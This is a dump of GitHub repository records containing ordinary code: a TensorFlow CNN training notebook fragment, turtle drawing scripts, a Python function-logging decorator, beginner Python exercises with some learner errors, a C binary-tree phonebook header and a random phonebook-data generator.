np.eye(n_classes)[y_test]\n\n\n\n\n# if you have variance problem use this class to increase your training data\nclass ImageTransformation:\n @staticmethod\n def flip_image_horizental(images):\n # images --> [batch, height, width, channels]\n return tf.image.flip_left_right(images)\n \n @staticmethod\n def flip_image_vertical(images):\n # images --> [batch, height, width, channels]\n return tf.image.flip_up_down(images)\n \n @staticmethod\n def rotate_image(images, degree):\n return tf.contrib.image.rotate(images, math.radians(degree))\n \n @staticmethod\n def transform_image(images, transform_vector):\n return tf.contrib.image.transform(images, transform_vector)\n\n\n\n# we use 2 convolutional layers, and use max pool in each convolutional layer, our classification layer \n# is 2 dense layers \ndef do_conv(input_tensor, W):\n # input_tensor --> [batch, height of image, width of image, number of channels]\n # W --> W is our kernel, [filter height, filter width, input channel, output channel].\n \n # padding SAME retain size of image during 
convolution operation by adding zero padding to image\n return tf.nn.conv2d(input_tensor, filter=W, padding='SAME', strides=[1,1,1,1])\n\n\ndef do_max_pool(input_tensor, window=2):\n # we do subsampling with this method i.e. if window=2 then tensor [10, 32, 32, 64] becomes [10, 16, 16, 64] after this operation\n return tf.nn.max_pool(input_tensor, ksize=(1, window, window, 1), strides=(1, window, window, 1), padding='VALID')\n\ndef dense_layer(input_tensor, neurons=128):\n # input_tensor --> [N(batch), M]\n dense_layer_weight = tf.Variable(tf.truncated_normal(shape=[int(input_tensor.get_shape()[1]), neurons], mean=0.0, stddev=0.2))\n dense_layer_bias = tf.Variable(tf.truncated_normal(shape=[neurons], mean=0.0, stddev=0.2))\n \n return tf.add(tf.matmul(input_tensor, dense_layer_weight), dense_layer_bias)\n \n\n\n\n\nX = tf.placeholder(dtype=tf.float32, shape=(None, 32,32,3), name='input_images')\n\n# none is batch size and 10 is the number of classes in encoded form\ny_true = tf.placeholder(dtype=tf.float32, shape=(None, 10), name='label_of_input_images')\n\n\n\n\n# we can use at most one -1 in shape argument. because the number of batch is unknown until run time. we use -1 \n# and tensor flow sets appropriate number in run time\nnet_in = tf.reshape(X, shape=[-1, 32,32,3])\n\n# our first convolution layer\n\nfilter_1 = tf.Variable(tf.truncated_normal(shape=[2, 2, 3, 32], stddev=0.5))\nbias_filter_1 = tf.Variable(tf.truncated_normal([int(filter_1.get_shape()[3])]))\nconv_1 = tf.nn.bias_add(do_conv(net_in, filter_1), bias_filter_1)\n\n\n# pass through elu activation function\nresult_conv_1 = tf.nn.elu(conv_1)\n\n# first subsample\nconv_1_subsample = do_max_pool(result_conv_1)\n\n# our second convolution layer\nfilter_2 = tf.Variable(tf.truncated_normal(shape=[2, 2, 32, 32], stddev=0.5))\nbias_filter_2 = tf.Variable(tf.truncated_normal([int(filter_1.get_shape()[3])]))\nconv_2 = tf.nn.bias_add(do_conv(conv_1_subsample, filter_2), bias_filter_2)\n\nresult_conv_2 = tf.nn.elu(conv_2)\n\nconv_2_subsample = do_max_pool(result_conv_2)\n# after two subsample our images size is 8 * 8\nflat_conv_2_subsample = tf.reshape(conv_2_subsample, shape=[-1, 8*8*32])\ndense_layer_1 = tf.nn.elu(dense_layer(flat_conv_2_subsample, neurons=32))\ndropped_1 = tf.nn.dropout(dense_layer_1,keep_prob=0.8)\ndense_layer_2 = tf.nn.elu(dense_layer(dense_layer_1, neurons=16))\ndropped_2 = tf.nn.dropout(dense_layer_2,keep_prob=0.8)\n\nclassification_layer = dense_layer(dropped_2, neurons=10)\n\n\n\n\nclassification_layer.get_shape()\n\n\n\n\ntrain_dataset = tf.data.Dataset.from_generator(image_training_generator, output_types=(tf.float32, tf.int32))\n\n\n\n\n# using batch(BATCH_SIZE) not works!, why?\ntrain_dataset = train_dataset.apply(tf.contrib.data.sliding_window_batch(window_size=BATCH_SIZE, window_shift=BATCH_SIZE))\ntrain_dataset = train_dataset.repeat(EPOCH)\n\n\n\n\niterator = train_dataset.make_one_shot_iterator()\nelements = iterator.get_next()\n\n\n\n\n\nloss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y_true, logits=classification_layer))\noptimzer = tf.train.AdamOptimizer(learning_rate=LEARNING_RATE)\ntrain = optimzer.minimize(loss)\n\n\n\n\nvars_init = tf.global_variables_initializer()\n\n\n\n\nwith tf.Session() as sess:\n sess.run(vars_init)\n step = 0\n counter = 0\n while True:\n try:\n images,labels = sess.run(elements)\n sess.run(train, feed_dict={net_in:images, y_true:labels})\n step += 1\n if step%100 == 0:\n counter += 1\n preds = tf.equal(tf.argmax(classification_layer, 1), 
tf.argmax(y_true, 1))\n acc = tf.reduce_mean(tf.cast(preds, tf.float32))\n res = sess.run(acc, feed_dict={net_in:x_test, y_true:y_test})\n print(f'accuracy after {counter*step} updates in weights: {res}')\n step = 0\n except tf.errors.OutOfRangeError: \n break\n\n\n\n# accuracy after 31200 updates in weights: 0.6800000254260437\n\n\n\n\n\n\n\n# In[ ]:\n\n\n\n\n" } ]
1
SergK9/turtle_exemple
https://github.com/SergK9/turtle_exemple
604567d6f792ba30bc4893fff5769cc27f3d8128
c0f48ea7ffff4fc4ad3fb4e74a3b06989b86f823
9aba3e13fb90675a572a673d65a816ee539c6ca2
refs/heads/main
2023-05-07T03:54:44.839623
2021-05-27T17:40:05
2021-05-27T17:40:05
371447440
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6703296899795532, "alphanum_fraction": 0.7362637519836426, "avg_line_length": 13.076923370361328, "blob_id": "bf75f6c2d258b092251a0a4782faa1af3340e9ca", "content_id": "ac99e7ea13b91a7afbcdcec3cf118a00953412c7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 182, "license_type": "no_license", "max_line_length": 24, "num_lines": 13, "path": "/main1.py", "repo_name": "SergK9/turtle_exemple", "src_encoding": "UTF-8", "text": "import turtle\n\nplayer = turtle.Turtle()\nplayer.shape(\"turtle\")\nplayer.forward(100)\nplayer.left(90)\nplayer.fd(100)\nplayer.lt(90)\nplayer.up()\nplayer.down()\nplayer.rt(90)\n\nturtle.done()" }, { "alpha_fraction": 0.5782312750816345, "alphanum_fraction": 0.7195767164230347, "avg_line_length": 12.926316261291504, "blob_id": "e36a4f34e71bd7b48033ad5e13b9d84ab15daedf", "content_id": "1ada0ecf64872c3de6a0d119bb82c2ce0244985f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1334, "license_type": "no_license", "max_line_length": 24, "num_lines": 95, "path": "/home1.py", "repo_name": "SergK9/turtle_exemple", "src_encoding": "UTF-8", "text": "import turtle\n\nartist = turtle.Turtle()\n#Рисуем крышу\nartist.lt(180)\nartist.fd(20)\nartist.fd(2)\nartist.lt(270)\nartist.fd(10)\nartist.rt(90)\nartist.fd(10)\nartist.rt(270)\nartist.fd(10)\nartist.lt(270)\nartist.fd(10)\nartist.lt(90)\nartist.fd(10)\nartist.rt(90)\nartist.fd(10)\nartist.lt(90)\nartist.fd(40)\nartist.rt(90)\nartist.fd(10)\nartist.rt(90)\nartist.fd(30)\nartist.lt(90)\nartist.fd(10)\nartist.rt(270)\nartist.fd(10)\nartist.rt(90)\nartist.fd(10)\nartist.rt(270)\nartist.fd(10)\nartist.rt(90)\nartist.fd(10)\nartist.rt(90)\nartist.fd(10)\nartist.lt(90)\nartist.fd(10)\nartist.lt(270)\nartist.fd(10)\nartist.rt(270)\nartist.fd(10)\nartist.lt(270)\nartist.fd(10)\nartist.rt(270)\nartist.fd(20)\n\nartist.rt(90)\nartist.fd(10)\nartist.rt(270)\nartist.fd(10)\nartist.lt(270)\nartist.fd(10)\nartist.lt(90)\nartist.fd(10)\nartist.lt(270)\nartist.fd(10)\nartist.lt(270)\nartist.fd(110)\n\nartist.lt(90)\nartist.fd(70)\nartist.lt(90)\nartist.fd(90)\nartist.lt(90)\nartist.fd(70)\nartist.lt(180)\nartist.fd(70)\nartist.lt(270)\nartist.fd(20)\nartist.rt(90)\nartist.fd(40)\nartist.lt(90)\nartist.fd(20)\nartist.lt(90)\nartist.fd(40)\nartist.up()\nartist.lt(180)\nartist.fd(30)\nartist.lt(90)\nartist.fd(20)\nartist.down()\nartist.rt(90)\nartist.fd(20)\nartist.lt(90)\nartist.fd(20)\nartist.lt(90)\nartist.fd(20)\nartist.lt(90)\nartist.fd(20)\nartist.up()\nartist.fd(1000)\nturtle.done()\nartist.hideturtle()\n" } ]
2
mehta-smit/function_logger
https://github.com/mehta-smit/function_logger
30a30089b5d5fdaf7a5cb7893563cac10fe22c5c
ca2d39fe6446c5d06b3c5a7e82260f8177039aed
752c1e0133a17c1ed4cb5e5b5aadfc34419cdbeb
refs/heads/master
2021-09-08T06:23:43.695896
2018-03-07T20:44:27
2018-03-07T20:44:27
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7389705777168274, "alphanum_fraction": 0.7444853186607361, "avg_line_length": 25.536584854125977, "blob_id": "917110fd2721a357fa230660c73cd1a4eb79f90b", "content_id": "e153014cde6b32f4128b03f216f0abc882fa68e9", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1088, "license_type": "permissive", "max_line_length": 237, "num_lines": 41, "path": "/README.md", "repo_name": "mehta-smit/function_logger", "src_encoding": "UTF-8", "text": "# function_logger\nPip install-able library that logs the function functionality in log file. Function logger is a decorator that logs the function name and function argument when function is called and return parameters of functions when function is ended\n\n\n\nInstallation Instruction!\n===================\n\n>- Activate your Virtual Environment.\n>- pip install function-logger\n\n----------\n\n**function-logger** is library having function logger that logs the function parameters.\n\n# Features\n\n 1. Function logger library comes with a function_logger decorator that takes a logger and logs the request paramters with function name and logs the return of function.\n\n# Usage\n\n 1. Import function logger library\n\t - `from function_logger import function_logger`\n\n# Example\n\n```python\nfrom function_logger import function_logger\nfrom logger import logger\n# logger of your project\n\n@function_logger(logger)\ndef log_function(name=None, age=None):\n logger.debug(\"Inside log function\")\n return dict(bmi=19)\n\n\nif __name__ == \"__main__\":\n\tbmi = log_function(name=\"hello\", age=13)\n\tprint bmi\n```\n" }, { "alpha_fraction": 0.41654136776924133, "alphanum_fraction": 0.41654136776924133, "avg_line_length": 26.70833396911621, "blob_id": "3feb2e97add1871ca97be7a7a8c3906ef0a655d2", "content_id": "cf840fbf68f18ac0aee2eba40bd06b9525b2ad49", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 665, "license_type": "permissive", "max_line_length": 67, "num_lines": 24, "path": "/function_logger/__init__.py", "repo_name": "mehta-smit/function_logger", "src_encoding": "UTF-8", "text": "from functools import wraps\n\n\ndef function_logger(logging):\n def wrap(func):\n @wraps(func)\n def function_log(*args, **kwargs):\n logging.debug(\n \"Inside Function {} with parameters: {},{}\".format(\n func.__name__,\n args,\n kwargs\n )\n )\n return_param = func(*args, **kwargs)\n logging.debug(\n \"Function: {} returns {}\".format(\n func.__name__,\n return_param\n )\n )\n return return_param\n return function_log\n return wrap\n" } ]
2
thaparudita/Python_Basics
https://github.com/thaparudita/Python_Basics
27130a2ff85bfcb45f79170c0223aa117d193968
dfc01aa5757f5dd94f710c4e9a6006ff64ffa20e
2d5b87c237f68468c572bc5abcba849458034616
refs/heads/master
2020-12-15T16:34:42.568331
2020-01-22T07:23:20
2020-01-22T07:23:20
235180122
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5407407283782959, "alphanum_fraction": 0.5814814567565918, "avg_line_length": 22.545454025268555, "blob_id": "cbf416015969c94e3f097f7a9437a0bc83aebd6b", "content_id": "7e59a34f90a81989437dc652fe65a858fab44f38", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 270, "license_type": "no_license", "max_line_length": 57, "num_lines": 11, "path": "/session6D.py", "repo_name": "thaparudita/Python_Basics", "src_encoding": "UTF-8", "text": "def square(numbers):\r\n print(\">> [square] numbers is:\",numbers, id(numbers))\r\n\r\n for i in range(0, len(numbers)):\r\n numbers[i] = numbers[i] * numbers[i]\r\n\r\n\r\n#list in python\r\nnumbers = [10, 20, 30, 40, 50]\r\n\r\nprint(\">> numbers is :\", numbers, id(numbers))\r\n" }, { "alpha_fraction": 0.5488371849060059, "alphanum_fraction": 0.5627906918525696, "avg_line_length": 14.692307472229004, "blob_id": "0d2567e7b5cf23c228b412f8faf7a1ad5964fe48", "content_id": "6cc9e92bd96e128e2a458f2b217f7960c0be1e39", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 215, "license_type": "no_license", "max_line_length": 48, "num_lines": 13, "path": "/session7C.py", "repo_name": "thaparudita/Python_Basics", "src_encoding": "UTF-8", "text": "\"\"\"\r\nIn dictionary we have indexes replaced with keys\r\nkeys can be of our choice\r\nand they must be always string\r\n\r\n\"\"\"\r\n\r\nstudent = {\r\n \"rollnum\" : 101,\r\n \"name\": \"John\",\r\n \"email\": \"[email protected]\",\r\n\r\n}" }, { "alpha_fraction": 0.4545454680919647, "alphanum_fraction": 0.4545454680919647, "avg_line_length": 15.600000381469727, "blob_id": "667f6da30179e378975706835fc99a47b623b397", "content_id": "4ba34faf1c0199c1e16aa899ba23b3ac49108435", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 88, "license_type": "no_license", "max_line_length": 29, "num_lines": 5, "path": "/session6B.py", "repo_name": "thaparudita/Python_Basics", "src_encoding": "UTF-8", "text": "def basic():\r\n print(\">> main function\")\r\n\r\nif __name__ == \"__main__\":\r\n basic()\r\n" }, { "alpha_fraction": 0.49013158679008484, "alphanum_fraction": 0.5032894611358643, "avg_line_length": 19.85714340209961, "blob_id": "4e94bb5748fdcf591670886a1aaf341b0a9bad8a", "content_id": "e7a46a91ab078cca3787a0503cc273687b82b03d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 304, "license_type": "no_license", "max_line_length": 40, "num_lines": 14, "path": "/session6A.py", "repo_name": "thaparudita/Python_Basics", "src_encoding": "UTF-8", "text": "print(\">>welcome to python app\")\r\n\r\nnum = int(input(\"enter a number : \"))\r\nprint(\">> 1. num is:\", num, id(num))\r\n\r\ndef square(n):\r\n global num\r\n n = n*n\r\n num = n\r\n print(\">> 2. num is:\", n, id(n))\r\n print(\">> 3. num is:\", num, id(num))\r\n\r\nsquare(num)\r\nprint(\">> 4. 
num is:\", num, id(num))" }, { "alpha_fraction": 0.38738739490509033, "alphanum_fraction": 0.4234234094619751, "avg_line_length": 10.55555534362793, "blob_id": "4bbf0810c19c9d2247b5b511c9863175679420e1", "content_id": "0cfa03c5bab581edf855d681f006354d5a1d61c0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 111, "license_type": "no_license", "max_line_length": 17, "num_lines": 9, "path": "/session6.py", "repo_name": "thaparudita/Python_Basics", "src_encoding": "UTF-8", "text": "def show(num):\r\n print(num)\r\n num -= 1\r\n if num == 0:\r\n show(num)\r\n return\r\n\r\n\r\nshow(10)" }, { "alpha_fraction": 0.5448179244995117, "alphanum_fraction": 0.6120448112487793, "avg_line_length": 15.800000190734863, "blob_id": "c0b4558aa7a489e5103ce5956b11a75d4ccbe738", "content_id": "cd0698a294d63585dfc269b12e6645b2344d78ee", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 714, "license_type": "no_license", "max_line_length": 50, "num_lines": 40, "path": "/session7D.py", "repo_name": "thaparudita/Python_Basics", "src_encoding": "UTF-8", "text": "data = [1, 2, 3, 4, 5]\r\nprint(len(data))\r\nprint(max(data))\r\nprint(min(data))\r\n\r\n\r\ndef mylen(data):\r\n length = 0\r\n return length\r\n\r\ndef mymax(data):\r\n max = 0\r\n return mymax\r\n\r\ndef mymin(data):\r\n min = 0\r\n return mymin\r\n\r\n\r\n# List Comprehension\r\n\r\nprint([x**2 for x in data])\r\n\r\n\r\nproductprices = [1241, 2654, 1793, 7954, 4615]\r\n#list comprehensions and expressions : ERROR\r\n\r\nprint([x = x - 0.4*x, for x in productprices])\r\n\r\nnumbers = list(range(1, 101))\r\nprint(numbers)\r\n\r\nnames1 = (\"John\", \"Jennie\", \"Jim\", \"John\", \"Jack\")\r\nnames2 = list(names1)\r\nnames3 = set(names1)\r\n# names4 = dict(names1) | Error\r\n\r\nprint(names1, type(names1))\r\nprint(names2, type(names2))\r\nprint(names3, type(names3))\r\n\r\n" }, { "alpha_fraction": 0.4375, "alphanum_fraction": 0.48355263471603394, "avg_line_length": 17.09677505493164, "blob_id": "f44082e69db9128f375bbf94a377cb61047fe8fe", "content_id": "1195a580dda8d11b98b6517069ee923b1c56faf2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 608, "license_type": "no_license", "max_line_length": 48, "num_lines": 31, "path": "/calculator.py", "repo_name": "thaparudita/Python_Basics", "src_encoding": "UTF-8", "text": "def add(plus):\r\n plus = num1 + num2\r\n print(\">> num1 + num2 = \", plus )\r\n\r\n\r\ndef sub(minus):\r\n minus = num1 - num2\r\n print(\">> num1 + num2 = \", minus)\r\n\r\n\r\ndef multiply(product):\r\n product = num1 * num2\r\n print(\">> num1 + num2 = \", product)\r\n\r\n\r\ndef divide(div):\r\n if num1 > num2 :\r\n div = num1 / num2\r\n print(\">> num1 / num2 = \", div)\r\n else:\r\n div = num2 / num1\r\n print(\">> num2 / num1 = \",div)\r\n\r\n\r\nnum1 = float(input(\">> ENTER NUMBER 1 :\", num1))\r\nnum2 = float(input(\">> ENTER NUMBER 2 :\", num2))\r\n\r\nadd()\r\nsub()\r\nmultiply()\r\ndivide()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n" }, { "alpha_fraction": 0.6430976390838623, "alphanum_fraction": 0.6540403962135315, "avg_line_length": 17.47541046142578, "blob_id": "c3f68ad7277f0bdcfd5a6e3b76b8595fec0240d3", "content_id": "54b9511a7dd92625335c77f086da004c856a9be8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1188, "license_type": "no_license", "max_line_length": 98, "num_lines": 61, "path": "/session7A.py", 
"repo_name": "thaparudita/Python_Basics", "src_encoding": "UTF-8", "text": "\"\"\"\r\nsequences in python\r\nsequence : data with quite similar type\r\n\r\nsequences listed below is also known as built in DS here in python\r\n\r\nWhy data is to be Structured ?\r\n1. Sort\r\n2. Search\r\n3. Filter\r\nPS :\r\n\"\"\"\r\n\r\nstudents = [\"John\", \"Jennie\", \"Jim\", \"Jack\", \"Joe\"]\r\nprint(students, id(students))\r\nprint(type(students))\r\n# CONCATENATION | IMMUTABLE\r\nnewstudents = (students + [\"Fionna\", \"George\"])\r\nprint(newstudents, id(newstudents))\r\n\r\nprint(students, id(students))\r\nprint(newstudents, id(newstudents))\r\n\r\nstudents = (students + [\"Fionna\", \"George\"])\r\nprint(students, id(students))\r\n\r\nprint()\r\n\"\"\"\r\n# REPETITION\r\n\r\nprint(students*2) # new tuple\r\n\r\n# MEMBERSHIP TESTING\r\n\r\nprint(\"John\" in students)\r\nprint(\"Dave\" not in students)\r\n\r\n\r\n# INDEXING\r\n\r\nprint(students[0])\r\nprint(students[len(students-1)])\r\n\r\n# SLICING\r\n\r\nprint(students[0:2]) # picking items from a range where 0 is inclusive and 2 is not\r\nfilteredstudents = students[1:4]\r\nprint(filteredstudents)\r\n\r\nprint()\r\n\r\n# basic for loop\r\n# for i in range(0, len(students)):\r\n# print(student[i])\r\n\r\n\r\n# Enhanced version for loop | for-each loop\r\n\r\nfor student in students:\r\n print[student]\r\n\"\"\"\r\n" }, { "alpha_fraction": 0.5674740672111511, "alphanum_fraction": 0.5743944644927979, "avg_line_length": 22.08333396911621, "blob_id": "131ff8e96785d0f85965870506a0d3c8b39d9605", "content_id": "ac3a18a3d3fa08c40eb16db3afe0592cce0ebfae", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 289, "license_type": "no_license", "max_line_length": 79, "num_lines": 12, "path": "/session6c.py", "repo_name": "thaparudita/Python_Basics", "src_encoding": "UTF-8", "text": "# something like pass by value but there is only pass by reference | as value\r\n\r\n\r\ndef square(num):\r\n num = num * num\r\n print(\">> [square] num is :\", num, id(num))\r\n\r\n\r\nnum = 10\r\nprint(\">> [main] num is:\", num, id(num))\r\nsquare(num)\r\nprint(\">> [main] num now is:\", num, id(num))\r\n" }, { "alpha_fraction": 0.4472573697566986, "alphanum_fraction": 0.4810126721858978, "avg_line_length": 17.75, "blob_id": "1d07b4806f35e0f87e4ac773689a8fa45712f9b3", "content_id": "613d2123c8085dc826cea22fa35a3b0a4270798e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 237, "license_type": "no_license", "max_line_length": 45, "num_lines": 12, "path": "/session5B.py", "repo_name": "thaparudita/Python_Basics", "src_encoding": "UTF-8", "text": "# iterations and loops\r\nnum = int(input(\"enter a num:\"))\r\ni = 1\r\n\r\nwhile i<= 10:\r\n print(num, \"\", i, \"is equal to\", (num*i))\r\n i+=1\r\n\r\nprint(\">>>><<<<\")\r\n\r\nfor i in range(10, 0, -1):\r\n print(num, \"\", i, \"is equal to\", (num*i))\r\n" }, { "alpha_fraction": 0.6647887229919434, "alphanum_fraction": 0.6647887229919434, "avg_line_length": 23.35714340209961, "blob_id": "6f712d86826acdf0ea506c53901dd32f102ffff2", "content_id": "26df161250aaf3ed6c00bea7404b79086c8370b6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 355, "license_type": "no_license", "max_line_length": 51, "num_lines": 14, "path": "/session7B.py", "repo_name": "thaparudita/Python_Basics", "src_encoding": "UTF-8", "text": "students = {\"John\", \"Jennie\", \"Jim\", 
\"Jack\", \"Joe\"}\r\nprint(students, id(students))\r\nprint(type(students))\r\n\r\nnewstudents = (students + {\"Fionna\", \"George\"})\r\nprint(newstudents, id(newstudents))\r\n\r\nprint(students, id(students))\r\nprint(newstudents, id(newstudents))\r\n\r\nstudents = (students + {\"Fionna\", \"George\"})\r\nprint(students, id(students))\r\n\r\nprint()\r\n" }, { "alpha_fraction": 0.5326433181762695, "alphanum_fraction": 0.566082775592804, "avg_line_length": 22.115385055541992, "blob_id": "bd3e34aae0f501680a3d4945c38de664c69b9229", "content_id": "02c8498e1aacfbba950773677bdf4687489110a8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1256, "license_type": "no_license", "max_line_length": 95, "num_lines": 52, "path": "/session7E.py", "repo_name": "thaparudita/Python_Basics", "src_encoding": "UTF-8", "text": "menu = {\r\n \"roti = 20\",\r\n \"paneer = 200\",\r\n \"dal = 100\",\r\n \"salad = 10\",\r\n}\r\n\r\ncart = []\r\nprint(cart, type(cart), len(cart))\r\n\r\nchoice = \"yes\"\r\n\r\nwhile choice == \"yes\":\r\n\r\n foodItem = input(\"enter a food item : \")\r\n cart.append(foodItem)\r\n choice = input(\"would like to add more items (yes/no) : \")\r\n\r\nprint(cart)\r\ntotalPrice = 0\r\nfor item in cart:\r\n totalPrice = totalPrice + menu[item]\r\n if amount > 200 and promoCode == \"Zomato\":\r\n amount = amount - (0.4 * amount)\r\n print(\">> Promo Code Zomato Applied Successfully. 40% OFF. Please Pay: \\u20b9\", amount)\r\n\r\n elif amount > 100 and promoCode == \"JUMBO\":\r\n\r\n discount = 0.5 * amount\r\n # Nested if/else\r\n if discount > 150:\r\n amount -= 150\r\n else:\r\n amount -= discount\r\n\r\n print(\">> Promo Code JUMBO Applied Successfully. 50% OFF. Please Pay: \\u20b9\", amount)\r\n\r\n else:\r\n print(\">> No Promo Code Found and no Discount Available\")\r\n print(\">> Please Pay: \\u20b9\", amount)\r\n\r\nprint(\"total price :\", totalPrice)\r\npromoCode = input(\"enter a promocode : \")\r\n\r\ncart.extend([\"salad\", \"noodles\"])\r\n\r\nprint(\"surprises in cart\", cart)\r\n\r\ncart.insert(1, \"soya champ\")\r\n\r\ncart.pop(2)\r\nprint(cart)\r\n\r\n" } ]
12
dzulaiman/binarysearch
https://github.com/dzulaiman/binarysearch
690133b19c275c4ede42505dda65993620f44438
1583356b0812918b1baed91aab54b2062e5b6240
53c3da09b77669fe7eb8085587246ce812603ed8
refs/heads/master
2020-06-02T08:59:31.568540
2013-04-19T02:52:29
2013-04-19T02:52:29
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6134805679321289, "alphanum_fraction": 0.6188119053840637, "avg_line_length": 25.775510787963867, "blob_id": "ec0d725df9f8f445bc812b88d493676ca619187e", "content_id": "0ddad682dc110717fb301f60a7498430e4613258", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 2626, "license_type": "no_license", "max_line_length": 65, "num_lines": 98, "path": "/Ph1tree.h", "repo_name": "dzulaiman/binarysearch", "src_encoding": "UTF-8", "text": "\n/*\n * File Name: Ph1tree.h\n * Name: Asmatullah Yaree, Mohd Dzul Aiman, Nursuliza, Maryam Adinehnia\n * Assignment: 1\n * Problem: 1\n * Date: March 28, 2013\n *\n * This is the interface file for the tree module. It \n * includes the constants, types, and function prototypes. \n * Documentation on how the function prototypes should be \n * used by a main program are included.\n */\n \n /* begin header file \"wrap\" */\n #ifndef _h5tree_h\n #define _h5tree_h\n \n #define MAX_NAME 30 /* maximum name length */\n \n typedef int treeKeyT;\n \n /* tree value data structure */\n typedef struct {\n char name[MAX_NAME+1]; /* one extra for null character */\n int number; /* the telephone number */\n } treeValueT;\n \n /* tree element data structure */\n typedef struct {\n treeKeyT key;\n treeValueT value;\n } treeElementT;\n \n typedef struct treeCDT *treeADT;\n \n /*\n * Function: TreeCreate\n * Usage: tree = TreeCreate();\n * ---------------------------\n * This procedure creates and initializes the root tree node.\n */\n treeADT TreeCreate(void);\n \n /*\n * Function: TreeDestroy\n * Usage: TreeDestroy(tree);\n * -------------------------\n * This procedure deallocates the memory used up by a tree.\n */\n void TreeDestroy(treeADT tree);\n \n /*\n * Function: TreeAdd\n * Usage: TreeAdd(tree,element);\n * -----------------------------\n * This procedure adds an element to the tree.\n */\n void TreeAdd(treeADT tree, treeElementT element);\n \n /*\n * Function: TreeDelete\n * Usage: element = TreeDelete(tree,key);\n * ----------------------------\n * This procedure deletes an element from a tree and returns it.\n */\n treeElementT TreeDelete(treeADT tree, treeKeyT key);\n \n /*\n * Function: TreeFind\n * Usage: found = TreeFind(tree,key);\n * ----------------------------------\n * This procedure attempts to find an element in the tree\n * with a corresponding key. If found, it returns a pointer\n * to that element. If not, it returns NULL.\n */\n treeElementT *TreeFind(treeADT tree, treeKeyT key);\n \n /*\n * Function: TreePrint\n * Usage: TreePrint(tree,outfileP);\n * --------------------------------\n * This procedure prints out the elements of a tree\n * using preorder traversal.\n */\n void TreePrint(treeADT tree, FILE *outfileP);\n \n /*\n * Function: PrintElement\n * Usage: PrintElement(element,outfileP);\n * --------------------------------------\n * PrintElement is not defined here in the tree module, it is\n * only prototyped here. 
It must be defined in the main program\n * to be used by TreePrint in the implementation module.\n */\n void PrintElement(treeElementT element, FILE *outfileP);\n \n /* end header file \"wrap\" */\n #endif\n\n" }, { "alpha_fraction": 0.5388683080673218, "alphanum_fraction": 0.5547329187393188, "avg_line_length": 24.554054260253906, "blob_id": "ae3553390d8cfa34c8e8d4bab4a0a16afbe6c215", "content_id": "0d28bf22c182ab04a50ec86a0d29f02217915026", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1891, "license_type": "no_license", "max_line_length": 64, "num_lines": 74, "path": "/random_data_generator.py", "repo_name": "dzulaiman/binarysearch", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n#Random intial data for binary tree\n#Output: %d %s %d\n#Given initial\n#[email protected]\n\nimport random\n\ndef random_int(sizesample):\n\n unique = []\n maximum = sizesample\n minimum = 1\n \n while(minimum<maximum+1):\n y = random.randrange(1,maximum+1)\n if y not in unique:\n unique.append(y)\n #Uncomment below to debug output x and y\n #print \"x :\", minimum, \"y :\", y\n minimum = minimum + 1\n\n return unique\n\ndef random_name(sizesamp):\n namefile = open(\"100names.txt\")\n nameread = namefile.readlines()\n name = ''.join(random.sample(nameread,sizesamp))\n name = name.strip(\"\\n\")\n return name\n\ndef random_phone():\n phone = ['1','2','3','4','5','6','7','8','9','0']\n #tel = [0,1] + phone\n tel = ''.join(random.sample(phone,7))\n return \"601\" + tel\n \n\nif __name__ == \"__main__\":\n\n print \"Generate random sample for node and names\\n\"\n \n samplecount = raw_input(\"How many samples to generate : \")\n sample = int(samplecount)\n \n number = random_int(sample)\n #names = random_name(sample)\n\n #Changelog in Python 2.7, no mode for 2 words, just a,w or r\n fileoutname = \"phonebook_random_\"+samplecount+\".txt\"\n fileout = open(fileoutname,\"a\")\n \n i = 1\n for num in number:\n num = str(num)\n name = random_name(1)\n phonenum = random_phone()\n outstring = num + \" \" + name + \" \" + phonenum\n print i, outstring\n fileout.write(outstring)\n fileout.write(\"\\n\")\n i = i + 1\n \n \"\"\"for num,name in zip(number,names):\n num = str(num)\n name = name.strip(\"\\n\")\n phonenum = random_phone()\n outstring = num + \" \" + name + \" \" + phonenum\n fileout.write(outstring)\n fileout.write(\"\\n\")\"\"\"\n \n fileout.close()\n \n print \"Output to file: \" + fileoutname\n" }, { "alpha_fraction": 0.654321014881134, "alphanum_fraction": 0.654321014881134, "avg_line_length": 19.25, "blob_id": "8915c01e9878b6a64e83d48a892826f405022a50", "content_id": "a13e099adb43a6acd1abe66e81fad68d9ce3ec64", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 81, "license_type": "no_license", "max_line_length": 47, "num_lines": 4, "path": "/README.md", "repo_name": "dzulaiman/binarysearch", "src_encoding": "UTF-8", "text": "binarysearch\n==================\n\nBinary Search Tree implementation in C language\n" }, { "alpha_fraction": 0.573904275894165, "alphanum_fraction": 0.582615077495575, "avg_line_length": 29.540616989135742, "blob_id": 